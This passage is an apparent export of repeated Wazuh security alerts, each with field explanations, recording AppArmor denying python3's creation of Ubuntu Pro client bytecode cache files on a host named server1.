When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.6364
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.541946+00:00 server1 kernel: audit: type=1400 audit(1745533322.540:1027): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/exceptions.cpython-312.pyc.124504253410736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.541946+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.6999
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.548927+00:00 server1 kernel: audit: type=1400 audit(1745533322.547:1028): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_apt_news" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/apt.cpython-312.pyc.132628381801856" pid=76916 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.548927+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.7626
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.576996+00:00 server1 kernel: audit: type=1400 audit(1745533322.575:1030): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/urls.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.576996+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/syslog
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.8264
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.448985+00:00 server1 kernel: audit: type=1400 audit(1745533322.445:1022): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/log.cpython-312.pyc.124504258771216" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.448985+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.8894
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.473370+00:00 server1 kernel: audit: type=1400 audit(1745533322.471:1024): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/secret_manager.cpython-312.pyc.124504252962736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.473370+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.9535
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.440199+00:00 server1 kernel: audit: type=1400 audit(1745533322.436:1021): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/__init__.cpython-312.pyc.124504254074288" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.440199+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.10170
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.495638+00:00 server1 kernel: audit: type=1400 audit(1745533322.493:1025): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_apt_news" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/__init__.cpython-312.pyc.132628381628208" pid=76916 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.495638+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.10805
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.470997+00:00 server1 kernel: audit: type=1400 audit(1745533322.469:1023): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/defaults.cpython-312.pyc.124504252962736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.470997+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.11441
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.508884+00:00 server1 kernel: audit: type=1400 audit(1745533322.503:1026): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/system.cpython-312.pyc.124504252964784" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.508884+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.12075
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.548927+00:00 server1 kernel: audit: type=1400 audit(1745533322.547:1028): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_apt_news" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/apt.cpython-312.pyc.132628381801856" pid=76916 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.548927+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
